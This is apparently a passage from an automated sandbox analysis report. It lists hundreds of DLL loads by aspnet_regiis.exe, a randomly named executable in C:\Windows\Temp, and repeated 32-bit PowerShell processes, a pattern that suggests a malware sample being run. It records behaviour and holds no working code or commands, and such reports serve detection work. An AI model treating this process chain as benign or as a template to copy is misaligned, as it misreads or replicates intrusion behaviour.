                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: version.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: wldp.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: amsi.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: userenv.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: profapi.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: gpapi.dll
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
